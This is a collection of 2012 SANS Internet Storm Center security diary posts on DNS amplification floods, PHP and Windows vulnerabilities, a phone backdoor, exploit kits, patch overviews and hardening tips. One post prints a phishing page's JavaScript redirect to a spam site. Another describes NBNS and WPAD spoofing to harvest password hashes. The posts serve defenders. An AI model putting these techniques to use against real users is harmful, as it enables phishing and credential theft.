Published: 2012-05-21

DNS ANY Request Cannon - Need More Packets

We have a report from our reader Tuukka, who observed a flood of DNS ANY requests from likely spoofed IP addresses.  What we know so far is that it seems to be a DNS Reflective Amplification Attack.  These usually use generic recursive DNS queries trolling for poorly configured DNS services.  This event is different in that the reflection is more targeted.  DNS 'ANY' record queries are only sent for domains for which the server is authoritative for, which the server will of course reply to regardless of available recursion.  These events have been validated by a real time observation by one of our handlers. Here is what we know so far.
Hit List: 
  • Source IP is spoofed
  • Flood lasts up to 60 seconds with 500 queries (as witnessed, but likely could be more)
  • Flood comes from a designated IP and seem to target multiple domains on authoritative server
  • All observed requests are similar thus far
  • This appears to be similar to what others have seen [1]

Example DNS Log Entry:
  • x.x.x.x is the spoofed/target server
  • example.com/ is the "reflecting" DNS server
21-May-2012 13:21:41.757 queries: info: client x.x.x.x#20475: view external: query: example.com IN ANY + (
21-May-2012 13:21:41.897 queries: info: client x.x.x.x#59247: view external: query: example.com IN ANY + (
21-May-2012 13:21:42.054 queries: info: client x.x.x.x#18676: view external: query: example.com IN ANY + (
21-May-2012 13:21:42.059 queries: info: client x.x.x.x#28530: view external: query: example.com IN ANY + (
21-May-2012 13:21:42.193 queries: info: client x.x.x.x#6489: view external: query: example.com IN ANY + (
We are interested in knowing if you have seen this and what you have done to mitigate any ill effects of such events.  Please post a comment to let us know.
We also want your DNS logs and packet capture logs of the events described in this diary.  There is still plenty to learn about this behavior.
If you see outbound ANY query floods from your own network: Try to identify the source machine. It would be interesting to see what tool causes these queries.
ISC Handler on Duty


Published: 2012-05-19

PHP 5.4 Exploit PoC in the wild

Clarifications/Updates to the original diary:

- This is NOT remote exploitable. An exploit would require the attacker to upload PHP code to the server, at which point, the attacker could just use PHP to run shell commands via "exec".

- only the windows version is vulnerable

- on windows, the "COM" functions are part of php core, not an extension.

- this is not at all related to the (more serious) CVE-2012-2336 vulnerability mentioned below. The com_type_info vulnerability is now known as CVE-2012-2376.


--- original report by Manuel ----


There is a remote exploit in the wild for PHP 5.4.3 in Windows, which takes advantage of a vulnerability in the com_print_typeinfo function. The php engine needs to execute the malicious code, which can include any shellcode like the the ones that bind a shell to a port.

Since there is no patch available for this vulnerability yet, you might want to do the following:

  • Block any file upload function in your php applications to avoid risks of exploit code execution.
  • Use your IPS to filter known shellcodes like the ones included in metasploit.
  • Keep PHP in the current available version, so you can know that you are not a possible target for any other vulnerability like CVE-2012-2336 registered at the beginning of the month.
  • Use your HIPS to block any possible buffer overflow in your system.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org


Published: 2012-05-18

ZTE Score M Android Phone backdoor

The ZTE Score M phone, apparently available via Metro PCS in the US, comes with a special suid backdoor. The backdoor for a change does not use a fixed "secret" root password. But instead, the suid binary "sync_agent" has to be called with a special parameter.

If you do have an Android phone, take a look if you have this application in "/system/bin". At this point, only this one particular model is reported to have this application present, but it would be odd to not have ZTE use the same backdoor on other models. 

Cataloging and limiting suid applications should be a standard unix hardening step. The simplest way in my opinion to find suid binaries is to use this find command:

find / -x -type f -perm +u=s

Files with the suid bit set will run as the user owning the file, not as the user executing the file. This is typically used to allow normal users to execute particular administrative tasks. So verify if you need or don't need to execute a particular binary as normal user before removing the suid bit.

Update: The file has also been found on the ZTE Skate.


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-17

ISC Feature of the Week: Tools->Information Gathering


One of the sections on the ISC Tools page is Information Gathering at https://isc.sans.edu/tools/#info-gathering. This collection will help you easily find out how your browser and plugins look to the outside and lists some other information lookup tools.


Browser Headers - https://isc.sans.edu/tools/browserinfo.html
How a server sees your browser.

Browser Plugin Detector - https://isc.sans.edu/tools/adobinator.html
This page attempts to detect various browser plugins. The detection code used was created using PluginDetect.

  • Lists plugins detected and various version information for each.

Site Availability Check - https://isc.sans.edu/tools/sitecheck.html
Checks if hostname is reachable.

  • Single input box.
  • Displays failure if unreachable.
  • If reachable, outputs:
    • Page load time
    • Page size in bytes
    • Return status code (ie. 200 success)
    • Final URL

Site DNS Check - https://isc.sans.edu/tools/dnscheck.html
Hostname to IP DNS resolver.

  • Single input box.
  • Output IP if system is able to resolve.

Whereis[IP] - https://isc.sans.edu/tools/whereis.html

  • Multi-line input box. Enter one(1) IP per line.
  • Output table contains:
    • IP ADDRESS queried
    • ASN of IP
    • NETWORK assignment
    • COUNTRY abbreviation
    • ISP name
    • RIR - Name of registry

Content Security Policy Test - https://isc.sans.edu/tools/csptest.html
Created for Firefox 4 but features may be found in other browsers.

  • Lots of details and information on the test outlined and explained on the page


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu



Published: 2012-05-17

Do Firewalls make sense?

Once in a while, someone comes up with the idea that firewalls are really not all that necessary. Most recently, Roger Grimes of Infoworld [1][2]. I am usually of the opinion that we definitely probably need firewalls. But I think the points made by the anti-firewall faction offer some insight into not only why we really need firewalls, but also what people don't understand about firewalls.

To clarify from the start: I am talking here about good old basic network firewalls. No deep packet inspection rules and no host based firewalls.

From a security point of view, firewalls offer two main functions: They regulate traffic, and they provide logs. The second part is often neglected. But look over some of the stories here, and quite frequently, you will find cases in which firewall logs tripped the scale. For example the "duplicate DNS response" issue earlier this week was initially found by an observant reader watching firewall logs.

When it comes to filtering, some consider firewalls not worth the trouble because "they only filter on ports that are closed on the server anyway". I think this shows a lack of understanding of what a firewall can do protecting servers. My best firewall wins came usually from outbound filtering from traffic trying to leave the server.

The next argument against firewalls is that there are usually better devices to do the filtering: Proxies have real application insight, router and switch ACLs can usually pick up the low end port filtering part. As far as the proxy is concerned: I say get one too. But proxies are usually rather complex devices to configure correctly and I rather get the easy stuff out of the way first using a firewall. At the same time: How do I make sure my traffic actually uses the proxy? That typically involves a firewall.

A switch or a router may have many features that are found in a classic firewall (even state-full rules and some application logic). They may be perfectly fine for a home user or a small business. However, in particular in an enterprise context, you probably want to split the firewall functionality to a different device, and with that to a different group of people. The people dealing with routing and network performance ("packet movers") are usually not the same people that are dealing with firewalls and filtering ("packet droppers").

But how many "modern" attacks are really blocked by firewalls? Aren't they all sending a spear phishing email to the user, tricking the user to download malware some chinese kid wrote via the filtering proxy we installed?  Next they exfiltrate the data via that same proxy (or DNS, or SMTP... or other services we have to allow)? In part, these modern attack are a testimony to the effectiveness of firewalls. An attacker would probably rather still use the same tool they used back in the 90s to brute force file sharing passwords and download data straight from the system. But sadly, because now even some universities block file sharing using a firewall, these attacks no longer work.

Against these modern attacks, we have other defenses. Some may work against the older versions of these attacks as well. In short, these defenses can be summarized as "end point protection" (whitelisting, anti-virus, host based firewall, hardening of the system...). Hardening a large number of end points is however a lot more difficult then configuring a few firewalls well placed at the right choke points.

By now, you are probably going to ask yourself: Why hasn't he talked about "defense in depth" yet? The argument doesn't really apply if you are trying to argue removing a device. Each additional security device can be justified with "defense in depth". But  some security devices don not add enough value to justify the expense. I don't think "defense in depth" itself can be used to justify a *particular* security device. It rather justifies the fact that some of our security devices are redundant and fulfill similar, but not identical, roles.

To summarize: If the last time you looked at your firewall rules and logs was back in 2003 to stop SQL slammer, you probably may as well get rid of it. But a well managed and configured firewall can have significant value. It is one of the simpler security devices you probably have. Consider it the good reliable 6 shooter as compared to the fancy (but sometimes flakey) F-22. Which one are you going to take along to get money from the ATM that just appeared in the DEFCON hotel lobby ;-) .

 Thoughts? Flames? Use the comment feature or sent us a non-public comment via the contact form.

[1] http://www.infoworld.com/d/security/the-firestorm-over-firewalls-193409
[2] http://www.networkworld.com/news/2005/070405perimeter.html

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-16

Reserved IP Address Space Reminder

As we are running out of IPv4 address space, many networks, instead of embracing IPv6, stretch existing IPv4 space via multiple levels of NAT. NAT then uses "reserved" IP address space. However, there are more address ranges reserved then listed in RFC1918, and not all of them should be used in internal networks. Here is a (probably incomplete) list of address ranges that are reserved, and which once are usable inside your network behind a NAT gateway.

List of Reserved IPv4 Address ranges
Address Range RFC Suitable for Internal Network RFC1122 no ("any" address) RFC1918 yes RFC6598 yes (with caution: If you are a "carrier") RFC1122 no (localhost) RFC3927 yes (with caution: zero configuration) RFC1918 yes RFC5736 no (not used now, may be used later) RFC5737 yes (with caution: for use in examples) RFC3068 no (6-to-4 anycast) RFC1918 yes RFC2544 yes (with caution: for use in benchmark tests) RFC5737 yes (with caution: test-net used in examples) RFC5737 yes (with caution: test-net used in examples) RFC3171 no (Multicast) RFC1700 no (or "unwise"? reserved for future use)

Most interesting in this context is RFC6598 (, which was recently assigned to provide ISPs with a range for NAT that is not going to conflict with their customers NAT networks. It has been a more and more common problem that NAT'ed networks once connected with each other via for example a VPN tunnel, have conflicting assignments.

Which networks did I forget? I will update the table for a couple days as comments come in.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-16

Got Packets? Odd duplicate DNS replies from 10.x IP Addresses

This is a clarification to Dan's diary from yesterday. We are interested to hear, if anybody else is seeing DNS replies from RFC1918 non-routable IP addresses, in particular from So far, we only have one report, and we are trying to figure out if this is something wide spread, or something unique to this user.

This reader first noticed the problem when the firewall reported more dropped packets from 10.x addresses. Two example queries that caused the problem are A queries for 25280.ftp.download.akadns.net and adfarm.mplx.akadns.net. The reader receives two responses: One "normal" response from the IP address the query was sent to, and a second response from the 10.x address. As a result, the problem would go unnoticed even if the 10.x response is dropped. Both responses provide the same answer, so this may not be an attack, but more of a misconfiguration.

As a side note, initially the DNS protocol specifically allowed for replies to arrive from an IP address different then the one the query was sent to:

"Some name servers send their responses from different addresses than the one used to receive the query. That is, a resolver cannot rely that a response will come from the same address which it sent the corresponding query to. This name server bug is typically encountered in UNIX systems." (RFC1035)

However, later in RFC2181, this requirement was removed:

"Most, if not all, DNS clients, expect the address from which a reply is received to be the same address as that to which the query  eliciting the reply was sent.  This is true for servers acting as clients for the purposes of recursive query resolution, as well as simple resolver clients.  The address, along with the identifier (ID) in the reply is used for disambiguating replies, and filtering  spurious responses.  This may, or may not, have been intended when the DNS was designed, but is now a fact of life." (RFC2181)

But we are NOT looking for responses that are coming from the wrong source, but duplicate responses. Once from the correct and once from the incorrect address.

Here an example "stray" packet submitted by the reader (slightly modified for privacy reasons and to better fit the screen)


Internet Protocol Version 4, Src: 10.17.x.y, Dst: ---removed---
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 
    Total Length: 84
    Identification: 0x2a7e (10878)
    Flags: 0x00
    Fragment offset: 0
    Time to live: 59
    Protocol: UDP (17)
    Header checksum: correct
User Datagram Protocol, Src Port: domain (53), Dst Port: antidotemgrsvr (2247)

Domain Name System (response)
    Transaction ID: 0xb326
    Flags: 0x8400 (Standard query response, No error)
        1... .... .... .... = Response: Message is a response
        .000 0... .... .... = Opcode: Standard query (0)
        .... .1.. .... .... = Authoritative: Server is an authority for domain
        .... ..0. .... .... = Truncated: Message is not truncated
        .... ...0 .... .... = Recursion desired: Don't do query recursively
        .... .... 0... .... = Recursion available: Server can't do recursive queries
        .... .... .0.. .... = Z: reserved (0)
        .... .... ..0. .... = Answer not authenticated
        .... .... ...0 .... = Non-authenticated data: Unacceptable
        .... .... .... 0000 = Reply code: No error (0)

    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0


        ads.adsonar.akadns.net: type A, class IN
            Name: ads.adsonar.akadns.net
            Type: A (Host address)
            Class: IN (0x0001)


        ads.adsonar.akadns.net: type A, class IN, addr
            Name: ads.adsonar.akadns.net
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 5 minutes
            Data length: 4
            Addr: (




Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-15

Odd DNS replies from 10 nets and RFC1323 impacting firewalls

 Reader Bob wrote in reporting seeing increasingly frequent incoming DNS replies on UDP 53, with valid DNS answers, but coming from source addresses in the 10.x.x.x/8 range. The responses appear to be from the Internet Roots to DNS servers that are querying the root.

Anyone else see this kind of behavior?

Over the past week another couple of readers have written in reporting issues accessing the ISC web page. The SANS NOC reports that RFC-1323 timestamps were getting scrubbed by our firewall to prevent information disclosure, but the checksum wasn't being updated.  The packet was subsequently dropped by the end device.

This appears to be impacting users using Bluecoat web proxies. We will have more to post on this topic throughout the day.

Handler Internet Storm Center


Published: 2012-05-14

Got packets? Interested in TCP/8909, TCP/6666, TCP/9415, TCP/27977 and UDP/7

We have noticed an increase in scanning activity to ports TCP/8909, TCP/6666, TCP/9415, TCP/27977 and UDP/7 and would love some packets if you have them. 

  • TCP/8909 - No idea what it is a new one for me. A new one and starting to trend.
  • TCP/6666 - this is probably going to be IRC, but it would be nice to confirm and see what is being scanned for.
  • TCP/9415 - this used to be associated with open proxies, but again be good to get some packets to check.
  • TCP/27977 - My first thought was gaming port, but that is just a guess.
  • UDP/7 - echo, a blast from the past.  maybe they are looking  for misconfigured or old routers and *nix boxes.

If you have any packets to the above please submit them through the contact form or email them to handlers -at- sans.edu or directly to me markh.isc -at- gmail.com

Thanks in advance.


Mark H


Published: 2012-05-14

Laptops at Security Conferences

I’m often curious what other security folks do to keep their machine safe when they go to IT conferences. I often see what looks like standard office machines being used and wonder if any precautions have been taken. So here’s what I do and I’d love to find out what other measure you take.

I’m about to spend a few days a large security conference, so I’m just putting the finishing touches to laptop I’m taking with me. As I don’t have any real needs beyond email, typing notes and web browsing, it’s a simple job of installing a clean OS and a couple of must have applications*. In keeping with Joel’s previous Diary, it took the duration of some reality TV show to install all the various patches for these apps to be up to date.

Now this is where I then go through my normal additional hardening steps. This OS happens to be Windows 7, so I disable a bunch of services, kill IPV6 services, gleefully disable hibernation and add in a gaggle firewall rules (or should that be an annoyance of firewall rules?).

The last thing I do make a record of clean state of the computer.  This is the part I’m assuming most companies have if they have managed operating environments (MOE) or standard operating environments (SOE) as this is such an easy thing to do and provides a trusted baseline for the security teams to compare against.

In Windows there’s a bunch of ways to ask the computer what’s running, what services and software is installed, but I like PowerShell so here’s a quick and dirty way to get the info and save it to a file.

From a PowerShell prompt:

#Installed Software
gp HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |Select DisplayName, DisplayVersion, Publisher, InstallDate, HelpLink, UninstallString | out-file c:build\base.txt
#Running processes
Get-Process | sort company | format-Table ProcessName -groupby company | out-file –append c:build\base.txt
#Services installed
Get-service * | out-file –append c:build\base.txt

This gives me three pieces providing a baseline** of the system.

I’m now ready to skip from vendor booth to vendor booth, keen to look at their product case studies conveniently on handy novelty USB devices, while surfing the web on freely provided Wifi doing on-line banking, checking today’s nuclear launch codes and wondering why I keep seeing "Loading Please Wait" when clicking on links in emails from people I’ve never heard of.  - Although this is an attempt at humour (note attempt) having a baseline of the clean machine allows me to identify the more obvious signs of something bad happening to my system.

If I do feel a disturbance in the force or the laptop does something odd, I can re-run my simple PowerShell commands (with a different output name) and look for changes.

#Comparing in PowerShell
Compare-Object -referenceobject $(Get-Content c:build\ base.txt) -differenceobject $(Get-Content c:build\new.txt)

That gives me a quick indication if some has changed on my systems (barring root kits) and if I need to worry about.

Let me know what you do or don't do when taking your system to a conference.


* I can’t say I’m a big fan of live CD/DVD/USB, I see their uses, but they get out of date, especially the browsers, far too quickly.

**If you want to get more fancy with the base snapshot, it’s pretty easy to script that out to include registry keys, firewall rules and even files in directories with cryptographic hash.


Chris Mohan--- Internet Storm Center Handler on Duty


I’m mentoring SANS Hacker Guard 464 class in Sydney on the 7th of August - SysAdmins, this is for you! https://www.sans.org/mentor/class/sec464-sydney-aug-2012-mohan


Published: 2012-05-13

Exploit Kits are a mess

As many of the Internet Storm Center readers know, my full time job is working for Sourcefire, the makers of SNORT, ClamAV, Razorback, Daemonlogger, and all of our commercial products.  I work in the Vulnerability Research Team (VRT), where my job is to write detection for the above tools; Snort rules, ClamAV detection, etc.   I often write about Snort related things here, since I know the SANS audience uses Snort heavily, and is even taught in the 503 course.

One of the areas that I've been looking at and following even more intently recently have been all the Exploit Kits.  I refer to things like Incognito, Blackhole, Crimepack, and many more.

Let me give you a couple external references to go read in case you have no idea what I am talking about:

Brian Krebs has some blog posts here and here about some updates to it.  But for a basic explanation of how the blackhole  kit exploits you, the end user, I suggest this pdf here.  

The Blackhole exploit kit in particular is very actively developed and changes rapidly to things that block its exploit methods.  Trust me.  As a person who follows all the particular versions of these exploit kits, they change just about weekly.  

You can be exploited by various kit by simply going to a website where some injected code rests on the page (you'll never see it - this is what we call a "drive by"), receiving some spam (Linkedin, USPS, UPS, I've even seen fake Pizza Delivery emails delivering things like the Pheonix Exploit kit) that redirects you to a "landing page", receiving spam with an html/htm email attachment..  The possibilities are essentially endless on how you can wind up on an exploit kit landing page.

Once on the landing page, there are lots of different ways that the exploit kit figures out how to take over your computer, but the basic point of the landing page is "which piece of software didn't this user patch?".  Vulnerabilities in browsers, java, even the delivery of a pdf to exploit a vulnerable version of Adobe Reader.

These kits are all over the place, and most likely, you are going to run into one of these (if you haven't already).

I basically have three pieces of advice for you.

1)  Don't open spam, or click on links inside of spam, or generally just be careful of the sites you go to.  If you are reading this webpage, you know there is a 'wild west' to the Internet.  Be careful.

2) Patch.  Everything.  Java, browsers, OS, Adobe Reader, etc.  Everything.  I literally cannot stress the importance of this enough.

3) Run AV and if you are on a corporate network, run an IPS. 

This is an evolving threat.  Nothing is going to 100% protect you all the time, however, the more layers you have, hopefully the more insulated you are against the threat, and you can protect yourself and your users.  

Good Luck!

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler



Published: 2012-05-12

Adobe Update to Vulnerabilities

Adobe released updates to three security vulnerabilities yesterday, where they address critical vulnerabilities that exists in older versions of the Adobe CS suite products.  As Adobe states “We are in the process of resolving the vulnerabilities addressed in these Security Bulletins in Adobe Illustrator CS5.x, Adobe Photoshop CS5.x (12.x) and Adobe Flash Professional CS5.x, and will update the respective Security Bulletins once the patches are available”. 

The update released by Adobe can be found here, and the individual vulnerabilities are listed below

Adobe Illustrator CS5.5
Adobe Photoshop CS5
Adobe Flash Professional CS5.5.1

These vulnerabilities are all of the critical nature, which if exploited could lead to a compromise of the system, without user interaction.  This vulnerability exists for both the Mac and Windows versions of the software.  So be on the lookout for more updates for older version of the Adobe CS suite.


tony d0t carothers -gmail


Published: 2012-05-11

ISC Feature of the Week: Link List


The ISC Links page at https://isc.sans.edu/links.html is a categorized list of information links. You can get to the page by the top-right menu and choosing Tools->Links. The list lets you vote a link up or down and there's even a form to suggest new links! Results are not updated realtime. Voting and URL addition is subject to approval.


Link List - https://isc.sans.edu/links.html#list

  • Links are listed down by most-to-least votes
  • Categories: Internet Status, Malware Information, Security Dashboards, Security Blogs, Vendor Security Advisories
  • Vote "in favor" or "against" a link
  • You may vote as many times as you wish, but only one vote per URL will count.

Add a new Site - https://isc.sans.edu/links.html#add

  1. You must be logged in to submit links
  2. Category: Choose an appropriate category for you link
  3. URL: Paste in the url you wish to submit
  4. Site Name: Enter a name for the URL you are submitting
  5. Click Submit to suggest the link for the page

Some hints:

  • Submit URLs that point to home pages / main pages, not to specific articles.
  • The page should be related to infosec, internet status or any of the other categories
  • If you submit a blog: It needs to have a few posts first.
  • We try to avoid linking directly to sites providing exploits.
  • Please let us know if we should add categories to the list.


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center - https://isc.sans.edu


Published: 2012-05-10

Safari 5.1.7 - an interesting feature

I am a Mac user.  Which means my daily browser is Safari.   This has been the case for a number of years, until version 5.1.4 was released in mid March.  Since that time I have experienced excessive memory consumption upwards of 1GB as cost of using Safari.  Prior to that release, no noticeable hit to my resources was observed.  

I updated my Mac book yesterday and noticed an improvement today.  We'll have to see how long that lasts. It's been less than 24 hours, so it really is too early to tell.

After all that blather is stated, an interesting feature can be noted on this most recent release of Safari.  Out of date Adobe Flash Players will be auto-disabled. [1]    Use the link below to get a little more info on it. There is not much more, but it explains how to re-enable an out of date Flash player.  

If you are unsure what plugin versions you have in your browser, then you can mosey over to google and look for a popular "browsercheck" website.  I would try out the link provided by a vendor that begins with a Q.      It is a slick tool that I've used to check on my browser plugin versions.

Feel free to leave us a comment or remark about your Safari travels and experience with this new feature.

ISC Handler on Duty

 [1] http://support.apple.com/kb/HT5271?viewlocale=en_US&locale=en_US


Published: 2012-05-09

Bogus emails: Amazon.com - Your Cancellation

There are bogus order cancellation emails going around claiming to be from Amazon like this:

Dear Customer,

Your order has been successfully canceled. For your reference, here's a summary of your order:

You just canceled order 15-6698-2492 placed on May 9, 2012.Status: CANCELED


1 "Mulberry"; 2006, Special Edition

  By: Sorcha Stewart

Sold by: Amazon.com LLC


Thank you for visiting Amazon.com!



Earth's Biggest Selection



The 15-6698-2492 in the copy I received linked to the URL http://repdesign.pt/requires.html which contains this is in the body:
<script type="text/javascript">window.location="http://leibypharmacylevitra.com";</script>

the web server seems to be down:
--2012-05-09 13:43:19--  (try: 7)  http://leibypharmacylevitra.com/Connecting to leibypharmacylevitra.com||:80... 

It is probably safe to assume that the content of that site is not user friendly.
Here is the full content of the page at repdesign.pt:
<html><head><script type="text/javascript">window.location="http://leibypharmacylevitra.com";</script></head><body><a href="http://leibypharmacylevitra.com">Click</a></body></html>
Handler ISC


Published: 2012-05-09

The day after patch Tuesday; sometimes called Wednesday

This is my first diary entry in several years. I am returning as a handler after a lengthy hiatus. I joined an organization which took too much time and did not permit this kind of interaction. It was worth it. That ride is coming to a close and I am happy to be able to return to this fine organization.

Today many of us are working through the monthly onslaught of patches and updates. Between the Microsoft May 2012 updates, PHP, ESX, and some Adobe updates there is quite a bit to think about. This is a monthly occurrence though. There are a number of steps organizations can take to prepare for this recurring event. A simple one is to mark the second Tuesday on a team calendar. Start to clear the deck on the Friday before and make sure that test systems on ready to go following the Tuesday release.

I have seen a number of approaches to patch preparation. At one extreme all critical systems are replicated in a lab, patches applied and a QA team validates key functions. At the other extreme, patches are just applied and then organization deals with the fall out. Not being an extremist I like to somewhere in the middle depending on organization size, mission, and capability.

There is also the triage effort for reviewing updates and determining how long to wait to get updates applied. I have seen one organization which waited 10 days after the MSFT release then applied all release patches counting on the forums and general buzz about the updates to call out any problems with them. This of course can leave the organization open to many other risks if an exploit is in the wild.

I advocate a more hands on approach especially with key systems. The organization just mentioned ran into a problem recently where two RADIUS (IAS) servers were taken offline by a patch which modified the CA cert. This brought the IAS servers down impacting wireless access for several hours while the problem was identified and investigated and resolved. Testing or patching one system at a time could have prevented or mitigated this outage.

What are some that work and some that don’t work? Care to share?



Published: 2012-05-08

PHP 5.4.3 and PHP 5.3.13 Released

In addition to other announcements, the folks behind PHP have released new versions in the 5.3 and 5.4 branches to address a couple of security issues.

5.3.13 addresses CVE-2012-2311 and 5.4.3 addresses both CVE-2012-2311 and CVE-2012-2329.

Details are available here: http://www.php.net/archive/2012.php#id2012-05-08-1


Published: 2012-05-08

May Adobe Security Bulletins

Adobe has released their monthly security bulletins today:

Note that APSB12-12 addresses Flash Professional, not the flash player add-on to your browser.  Also of note is that the first three bulletins simply inform users that their current version of the software is vulnerable, and that the upgraded version isn't.  No free security patch options, just pay to upgrade.  At least the Shockwave player update is free.


Published: 2012-05-08

Symantec False-Positive Issue with XLS Files - Bloodhound.Exploit.459

John writes in to report that Symantec has announced an issue with their current definition files that may generate false-positive alerts on .xls files.

Thanks John!


Published: 2012-05-08

Microsoft May 2012 Black Tuesday Update - Overview

Overview of the May 2012 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS12-029 Microsoft Word RTF Import
(Replaces MS10-079, MS11-089, MS11-094)
Microsoft Word 2003 and 2007
KB 2680352 No publicly known exploits Severity:Critical
Exploitability: 1
MS12-030 Microsoft Office Remote Code Execution Vulnerabilities
(Replaces MS11-072, MS11-089, MS11-094, MS11-096)
Microsoft Excel 2003/2007/2010
KB 2663830 Yes (CVE-2012-0143) Severity:Critical
Exploitability: 3,3,1,1,2,1
MS12-031 Visio Viewer 2010 Remote Code Execution Vulnerability
(Replaces MS12-015)
Microsoft Visio Viewer 2010
KB 2597981 No publicly known exploits Severity:Important
Exploitability: 1
MS12-032 TCP/IP Elevation of Privilege and Firewall Bypass Vulnerability
(Replaces MS11-083)
TCP/IP, Windows Firewall
KB 2597981 No publicly known exploits Severity:Important
Exploitability: 1
important important
MS12-033 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Plug and Play (PnP) Configuration Manager Vulnerability
KB 2690533 Elevation of Privilege Severity:Important
Exploitability: Likely
Important Important
MS12-034 Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
(Replaces MS11-029, MS12-018)
Microsoft Windows, Microsoft .NET Framework, Microsoft Silverlight, Microsoft Office
KB 2681578 Yes Severity:Critical
Exploitability: 1,1,1,1,2,1,1,1,1,1
MS12-035 .Net Framework Remote Code Execution
(Replaces MS11-044, MS11-078, MS12-016)
.NET Framework
KB 2693777 No publicly known exploits Severity:Critical
Exploitability: 1
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a t ypical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.


Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center - https://isc.sans.edu


Published: 2012-05-08

Windows Firewall Bypass Vulnerability and NetBIOS NS

One of the attacks I always perform when doing internal penetration tests is NetBIOS Name Spoofing. NetBIOS has been a golden mine for penetration testers for years – many good articles about how to use NBNS spoofing have been written, and Metasploit comes with a module that allows you to easily abuse NBNS in order to collect LM and NT hashes from victim machines (of course, depending if LANMAN has been disabled or not).

I wrote a diary about this back in January so if you want to see details on how to abuse this I’d suggest that you read http://isc.sans.edu/diary.html?storyid=12454 first.

However, attacking clients, retrieving their LM/NT hashes and cracking them, as fun as it is, is only half of the job a penetration tester has to do. Besides capturing the flag, the report you produce must also include recommendations on how to mitigate the detected vulnerability otherwise it is really useless for your client (no matter how cool it is for us penetration testers to pwn something).

So after seeing NBNS being abused in many internal penetration tests (all?) I started checking what potential security controls we have at our disposal to prevent such attacks, or at least to make them less effective.

Obviously, the best way to prevent NBNS spoofing attacks is to completely disable NetBIOS name resolution. However, this maybe be easier said than done – from the diary I posted before (link above) it appears that there are many other services that still depend on NBNS.

Since Windows operating systems now come with a firewall (“Windows firewall” with Windows XP SP2 and “Windows Firewall with Advanced Security” with Vista and newer OSes) that can have multiple policies, depending on the current location of the machine (home, work or public networks), this sounded like a perfect idea for preventing NBNS attacks. In this scenario, an administrator that controls client machines through group policies could allow NBNS in home and work networks and disable it completely in public networks. While not perfect, this still offers a certain (and I’d say decent) amount of protection.

However, while testing this I noticed that the Windows firewall has a nasty bypass vulnerability (the now patched CVE-2012-0174 vulnerability).

In order to test it I turned on both inbound and outbound firewalls – remember that the Windows built-in firewall does not stop outbound connections by default:

Windows Firewall profile settings
Besides this, NBNS rules had to be disabled manually, in order to prevent NB-Name-Out network traffic. By stopping this traffic we would make sure that an attacker cannot abuse NBNS spoofing attacks, since the built-in firewall would stop all such outgoing requests. You can see the rules, with their respective profiles in the following picture:

Windows Firewall settings
After setting this, I expected that my NBNS spoofing attacks will fail. However, that did not happen – the attacks were still successful, and I was able to see NBNS queries on my local network. After setting up logging in the Windows firewall as well, I confirmed that Windows was happily letting this traffic leave, despite all the rules that have been set above:

2012-01-29 11:07:21 ALLOW UDP 137 137 0 - - - - - - - SEND

This log shows a NBNS query destined to the local network’s broadcast address.

The issue here is pretty clear – this means that an organization’s administrator who set such rules to protect his clients when they leave the organization’s network cannot rely on the built-in Windows firewall!

And, if you take a look at the attack scenarios I mentioned in the first diary, this can be particularly nasty for browsers configured in organizations. For example, a lot of organizations configure browsers on client machines to automatically open intranet portals, which are typically hosted on machines with names “intranet”, “portal” or similar.

When a user with such a machine connects to an open wireless network and opens a browser, the browser will first try to resolve such a name via DNS. When that fails, the machine will try to resolve this name via NBNS and this is where an attacker can fake the response and start collecting LM/NT hashes.

Another very nasty scenario includes machines looking for WPAD (Web Proxy Auto-Discovery). By spoofing this request, an attacker can “push” his own machine as the web proxy and the client’s web browser will happily use it, allowing the attacker to analyze network traffic and at least try to launch Man-in-the-Middle attacks (hopefully, we’ve trained our users not to click on certificate warnings, right?).

So, I got in touch with Microsoft and the MSRC guys verified that this is indeed an issue with the firewall. The conversations with the MSRC guys were great and, as you can see, the patch has been released that fixes this vulnerability.

